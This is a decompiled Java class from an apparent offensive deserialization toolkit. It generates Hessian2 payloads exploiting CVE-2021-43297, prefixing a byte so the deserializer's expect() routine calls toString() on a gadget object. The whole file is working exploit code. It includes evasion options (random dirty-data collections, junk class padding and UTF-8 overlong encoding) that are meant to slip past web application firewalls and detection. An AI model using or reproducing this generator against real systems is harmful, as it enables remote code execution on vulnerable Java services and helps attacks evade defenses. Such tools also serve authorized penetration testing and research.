package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.PayloadMode;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.core.payload.AbstractHessianPayload;
import com.ar3h.chains.core.payload.enhance.DirtyDataWrapper;
import com.ar3h.chains.core.payload.enhance.Hessian2OutputEnhance;
import com.caucho.hessian.io.Hessian2Output;
import com.vaadin.sass.internal.parser.LexicalUnitImpl;
import java.io.ByteArrayOutputStream;
import javax.resource.spi.work.WorkException;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@PayloadAnnotation(name = "Hessian2 强制报错调用 toString", description = "CVE-2021-43297\nHessian2Input 的 com.caucho.hessian.io.Hessian2Input.expect 函数内可以通过隐式字符串转换触发对象的toString方法", gadgetTags = {Tag.ToString}, excludes = {Tag.NotForHessian}, mode = {PayloadMode.GENERATE_MODE}, priority = 10)
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/Hessian2ToStringPayload.class */
public class Hessian2ToStringPayload extends AbstractHessianPayload {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) Hessian2ToStringPayload.class);

    @Max(30000000)
    @Param(name = "随机集合脏数据大小", description = "随机使用 ArrayList/LinkedList/HashMap/LinkedHashMap/TreeMap 等集合类型来封装 object，并指定脏数据大小\n推荐使用该混淆\n参考数据：1千万脏数据需要2秒, 可生成 43MB Payload")
    @Min(0)
    public int dirtyCollectionSize = 0;

    @Max(LexicalUnitImpl.PRECISION)
    @Param(name = "填充垃圾类的数量", description = "使用 LinkedList 包装随机垃圾类名来封装 object\n生成速度极慢，不建议设置超过10w\n参考数据：10w脏数据需要8秒, 可生成 2.5MB Payload")
    @Min(0)
    public int dirtyClassSize = 0;

    @Param(name = "Utf8OverlongEncoding", description = "0: 不开启 utf8 overlong encoding\n1: 随机平均混合2、3 utf8 overlong encoding\n2: 纯2字节 utf8 overlong encoding\n3: 纯3字节 utf8 overlong encoding", type = ParamType.Choice, choices = {@Choice(label = "0", value = "不开启 utf8 overlong encoding"), @Choice(label = "1", value = "随机平均混合2、3 utf8 overlong encoding"), @Choice(label = "2", value = "纯2字节 utf8 overlong encoding"), @Choice(label = WorkException.TX_RECREATE_FAILED, value = "纯3字节 utf8 overlong encoding")})
    public String overlongMode = "0";

    /* JADX WARN: Can't rename method to resolve collision */
    @Override // com.ar3h.chains.common.Payload
    public byte[] marshal(Object obj) throws Exception {
        int parseInt = Integer.parseInt(this.overlongMode);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);
        Object build = DirtyDataWrapper.builder(obj).withDirtyCollectionSize(this.dirtyCollectionSize).withDirtyClassSize(this.dirtyClassSize).build();
        if (parseInt > 0) {
            log.info("Enable Hessian2 utf8overlong, overlongMode: {}", Integer.valueOf(parseInt));
            hessian2Output = Hessian2OutputEnhance.getHessian2Output(byteArrayOutputStream, parseInt);
        }
        AbstractHessianPayload.NoWriteReplaceSerializerFactory noWriteReplaceSerializerFactory = new AbstractHessianPayload.NoWriteReplaceSerializerFactory();
        noWriteReplaceSerializerFactory.setAllowNonSerializable(true);
        hessian2Output.setSerializerFactory(noWriteReplaceSerializerFactory);
        hessian2Output.writeObject(build);
        hessian2Output.close();
        byte[] byteArray = byteArrayOutputStream.toByteArray();
        byte[] bArr = new byte[byteArray.length + 1];
        System.arraycopy(new byte[]{67}, 0, bArr, 0, 1);
        System.arraycopy(byteArray, 0, bArr, 1, byteArray.length);
        return bArr;
    }

    @Override // com.ar3h.chains.common.Payload
    public Object unmarshal(byte[] bArr) throws Exception {
        return Hessian2Payload.deserialize(bArr);
    }
}
